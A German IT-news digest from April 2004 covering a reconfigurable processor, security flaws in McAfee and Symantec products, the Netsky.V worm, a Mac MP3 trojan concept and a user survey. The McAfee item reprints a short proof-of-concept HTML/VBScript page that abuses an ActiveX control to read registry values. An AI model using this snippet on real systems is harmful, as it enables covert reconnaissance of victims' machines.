|
Mit 300 MHz schneller als 2 GHz Rechner
Das kalifornische Unternehmen "Stretch" hat einen Prozessor vorgestellt,
dessen Befehlssatz sich während des Betriebes erweitern lässt. Möglich
macht das laut Hersteller ein 32-Bit-Kern mit RISC-Architektur (Reduced
Instruction Set Computing), der um ein frei programmierbares ISEF (Instruction
Set Extension Fabric) ergänzt wurde. Dabei werden die Leistungsanforderungen
einer Anwendung ständig analysiert. Daraufhin erweitert ein spezieller
Compiler den Befehlssatz. So lassen sich Rechenoperationen, die ein
herkömmlicher RISC-Prozessor in tausende Einzelschritten aufteilen muss,
innerhalb eines CPU-Taktes ausführen. Vorteile entstehen damit vor allem
beim Einsatz von Verschlüsselungssoftware und beim Verarbeiten digitaler
Videos. In Tests habe der mit 300 Megahertz getaktete Prozessor "S5000"
herkömmliche mit 2,0 Gigahertz getaktete Prozessoren übertroffen. Der
S5000 soll noch dieses Jahr zu Preisen zwischen 35 und 100 Dollar in
den Handel kommen. (28.04.04,
Computerwoche)
McAfee VirusScan - ActiveX-Controls unsicher
Weil der Virenscanner von McAfee auf Windows-Systemen unsichere ActiveX-Controls
installiert, können Fremde Zugriff auf die Registry erhalten. Das Opfer
muss dazu nur mit dem Internet Explorer 6 (Standard-Sicherheitseinstellungen)
eine Webseite aufrufen, in dem entspechender Scripting-Code enthalten
ist. Jonathan Payne, Entdecker der Lücke, hat dazu folgenden Code veröffentlicht,
der zu Demonstrationszwecken Informationen zum Desktop-Hintergrundbild
ausgibt:
<html>
<object classid="clsid:4C29D864-C55A-46DD-865C-17A1B7CC1A1A" id="gobjReg"
style="display: none;">
</object>
<h1>McAfee installer test
<script language="vbscript">
document.write( _
gobjReg.RegQueryValue( "HKCU\Control Panel\Desktop", "Wallpaper") _
)
</script>
</html>
Ersetzt man Schlüssel und Wert etwa durch:
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters", "DhcpNameServer"
so lässt sich der Nameserver des Netzwerkes abfragen, an das der Client
angeschlossen ist. Angreifer können somit Informationen über Zielsysteme
zusammentragen.
Welche Versionen noch ausser der Version 8.0 betroffen sind ist nicht
bekannt. VirusScan installiert ausserdem noch weitere Controls, mit
denen der Zugriff auf das Dateisystem und die Konfiguration des Betriebssystems
möglich ist. Eine Lösung für das Problem gibt es derzeit nicht. Anwender
sollten ActiveX deaktivieren, dann allerdings gelingen zumindest die
Aktualisierungen für die Virenscanner-Signaturen nicht mehr. Welche
Auswirkungen eine Deaktivierung von ActiveX insgesamt auf den McAfee-Virenscanner
hat, ist derzeit noch nicht letztlich geklärt. (28.04.04,
Heise)
Sicherheitslücken in Symantecs Firewalls
In Symantecs Client-Firewall-Produkten für Windows ist ein Fehler enthalten,
mit denen Angreifer von außen das System zum Stillstand bringen können.
Laut Advisory des Herstellers hat der Sicherheitsdienstleister eEye
die Schwachstelle während einiger Tests entdeckt. Nach einer nicht näher
erläuterten TCP-Attacke sei ein Reboot erforderlich, um mit dem Rechner
wieder arbeiten zu können. Betroffen sind:
Symantec Norton Internet Security und Professional 2003, 2004
Symantec Norton Personal Firewall 2003, 2004
Symantec Client Firewall 5.01, 5.1.1
Symantec Client Security 1.0 and 1.1
Symantec hat Patches für die Fehler entwickelt. Anwender, die ihr System
regelmäßig über LiveUpdate aktualisieren, sollten nach Angaben von Symantec
schon nicht mehr verwundbar sein. Benutzer der Corporate Versionen von
Symantec Client Firewall und Symantec Client Security müssen sich die
Patches manuell von Symantecs Website besorgen und installieren. (22.04.04,
Heise)
Wurm Netsky.V infiziert ohne Dateianhang
Eine neue Variante des mittlerweile verbreiteten Wurms Netsky infiziert
den PC eines Anwenders bereits beim Lesen der verseuchten E-Mail. W32/Netsky-V
nutzt dazu Sicherheitslücken in der Microsoft-Software aus. Die E-Mail
des Wurms, die in der Regel den Nachrichtentext 'Converting message.
Please wait...' oder 'Please wait while loading failed message...' enthält,
versucht einfach eine Kopie des Wurms vom bereits befallenen PC eines
anderen Anwenders herunterzuladen. Es wird dringend ein Update der Virensignaturen
bestehender Anti-Viren- Software und ein Windowsupdate empfohlen. (15.04.04,
ZDNet)
Angeblicher Mac-Trojaner aufgetaucht
Ein als MP3 getarnter Trojaner ist angeblich in der Lage sämtliche Dateien
auf Computern mit Mac OS X zu löschen. Tatsächlich handelt es sich dabei
jedoch um eine Machbarkeitstudie. Die MP3-Datei enthält in ihrem ID3-Tag
Code, der eine Meldung auf dem Bildschirm anzeigt. Gleichzeitig startet
er das Programm iTunes, das dann den MP3-Inhalt abspielt. Dass der Code
überhaupt ausgeführt wird, liegt an der Art und Weise, wie Mac OS Programme
erkennt: Die Datei enthält so genannte carb- und cfrg-Ressourcen; letztere
zeigt auf den Code im ID3-Tag. Der Finder zeigt die Datei als normales
MP3 an, weil sie die Dateiendung .mp3 trägt; ein Blick auf die erweiterten
Dateiinformationen enttarnt sie aber als Programm.
Letztendlich ist der MP3Concept oder MP3Virus.Gen getaufte "Trojaner"
also nichts anderes als ein als normale Datei getarntes Programm. Dass
ein tatsächlicher, nach diesem Muster gestrickter Schädling sich per
E-Mail oder über Tauschbörsen verbreiten könnte, ist unwahrscheinlich:
Er müsste mit BinHex oder StuffIt komprimiert sein, weil sonst die zum
Ausführen notwendigen Ressourcen verloren gehen. (11.04.04,
Heise)
Immer mehr Deutsche fluchen am PC
Spam, Viren und Würmer belasten offenbar immer häufiger das Nervenkostüm
deutscher Anwender. Dies geht aus einer Umfrage hervor, die der Anti-Viren-Spezialist
Symantec in Zusammenarbeit mit der TV-Zeitschrift Hörzu ermittelt hat.
In den vergangen Wochen wurden zu dem Thema "Ärgernisse am PC" mehr
als 3.000 Internetnutzer im Alter zwischen 30 und 50 Jahren befragt.
Für 80 Prozent der Befragten ist es bereits normal geworden, das Internet
bei der täglichen Arbeit bzw. in der Freizeit zu nutzen. Über die Hälfte
der Befragten gab allerdings an, mit der Performance bzw. den Nebenwirkungen
unzufrieden zu sein. Insbesondere die langen Ladezeiten strapazieren
die Nerven. Bereits auf Platz zwei folgen die unerwünschten Werbe-E-Mails,
so genannter Spam. Jeder (!) der Befragten erhält nach eigenen Aussagen
regelmäßig Spam-Mails, jeder Vierte sogar mehr als zehn pro Tag.
Ebenso bedrohlich sei den Ergebnissen der Umfrage zufolge die Verbreitung
von Viren und Würmern. Mehr als die Hälfte der Anwender sei bereits
schon einmal Opfer einer Attacke eines Virus gewesen. Werbebanner und
Popups sorgen ebenfalls für wenig Freude bei den Usern. Erst an fünfter
Stelle folgen Programm- oder Rechnerabstürze. Auf den Plätzen sechs
bis neun folgen Dialer, Spionagesoftware, Datenmissbrauch durch Hacker,
zu viele Passwörter, die man sich merken muss und der plötzliche Datenverlust.
Der Einsatz von Firewalls ist indes noch keine Selbstverständlichkeit.
Nur 29 Prozent gaben an, eine solche Sicherheitslösung auf dem eigenen
Rechner installiert zu haben. Interessant: 43 Prozent der Befragten
gaben an, kräftig zu fluchen, wenn wirklich einmal etwas passiert. Nur
14 Prozent bleiben ruhig und gelassen. (06.04.04,
Onlinekosten.de)
|
